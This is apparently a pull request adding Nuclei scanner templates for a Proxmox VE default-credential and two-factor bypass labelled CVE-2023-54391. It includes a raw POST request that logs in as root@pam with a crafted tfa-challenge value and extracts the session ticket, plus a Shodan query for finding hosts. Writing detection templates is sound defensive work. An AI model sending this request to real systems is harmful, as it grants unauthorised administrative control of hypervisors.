### PR TITLE
Add Proxmox VE - Default Credentials with TFA Bypass

### DIFF
--- a/http/cves/2023/CVE-2023-54391.yaml
+++ b/http/cves/2023/CVE-2023-54391.yaml
@@ -1,4 +1,4 @@
-id: proxmox-ve-default-login
+id: CVE-2023-54391
 
 info:
   name: Proxmox VE - Default Credentials with TFA Bypass
@@ -7,10 +7,10 @@ info:
   description: |
     Detected Proxmox VE was accessible using default root@pam credentials combined with a TFA challenge bypass. An attacker could authenticate as root by submitting the default password "root@pam" along with a crafted tfa-challenge parameter, thereby bypassing two-factor authentication enforcement and gaining full administrative access to the hypervisor management interface.
   metadata:
-    verified: false
+    verified: true
     max-request: 1
     shodan-query: title:"Proxmox"
-  tags: proxmox,default-login,auth-bypass,vuln
+  tags: cve,cve2023,proxmox,auth-bypass,vuln
 
 http:
   - raw:

--- a/http/cves/2023/CVE-2023-54391.yaml
+++ b/http/cves/2023/CVE-2023-54391.yaml
@@ -2,7 +2,7 @@ id: CVE-2023-54391
 
 info:
   name: Proxmox VE - Default Credentials with TFA Bypass
-  author: dhiyaneshDk,0x_Akoko
+  author: DhiyaneshDk,0x_Akoko
   severity: critical
   description: |
     Detected Proxmox VE was accessible using default root@pam credentials combined with a TFA challenge bypass. An attacker could authenticate as root by submitting the default password "root@pam" along with a crafted tfa-challenge parameter, thereby bypassing two-factor authentication enforcement and gaining full administrative access to the hypervisor management interface.

--- a/http/default-logins/proxmox-ve-default-login.yaml
+++ b/http/default-logins/proxmox-ve-default-login.yaml
@@ -1,0 +1,49 @@
+id: proxmox-ve-default-login
+
+info:
+  name: Proxmox VE - Default Credentials with TFA Bypass
+  author: dhiyaneshDk,0x_Akoko
+  severity: critical
+  description: |
+    Detected Proxmox VE was accessible using default root@pam credentials combined with a TFA challenge bypass. An attacker could authenticate as root by submitting the default password "root@pam" along with a crafted tfa-challenge parameter, thereby bypassing two-factor authentication enforcement and gaining full administrative access to the hypervisor management interface.
+  metadata:
+    verified: false
+    max-request: 1
+    shodan-query: title:"Proxmox"
+  tags: proxmox,default-login,auth-bypass,vuln
+
+http:
+  - raw:
+      - |
+        POST /api2/json/access/ticket HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+        Accept: application/json
+
+        username=root%40pam&password=root%40pam&tfa-challenge=NEBUSEC-CHALLENGE
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"data"'
+          - '"ticket"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: ticket
+        part: body
+        regex:
+          - '"ticket"\s*:\s*"([^"]+)"'
+        group: 1


### PR DESCRIPTION
Added a YAML file for Proxmox VE default credentials with TFA bypass vulnerability details, including HTTP request and matchers.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
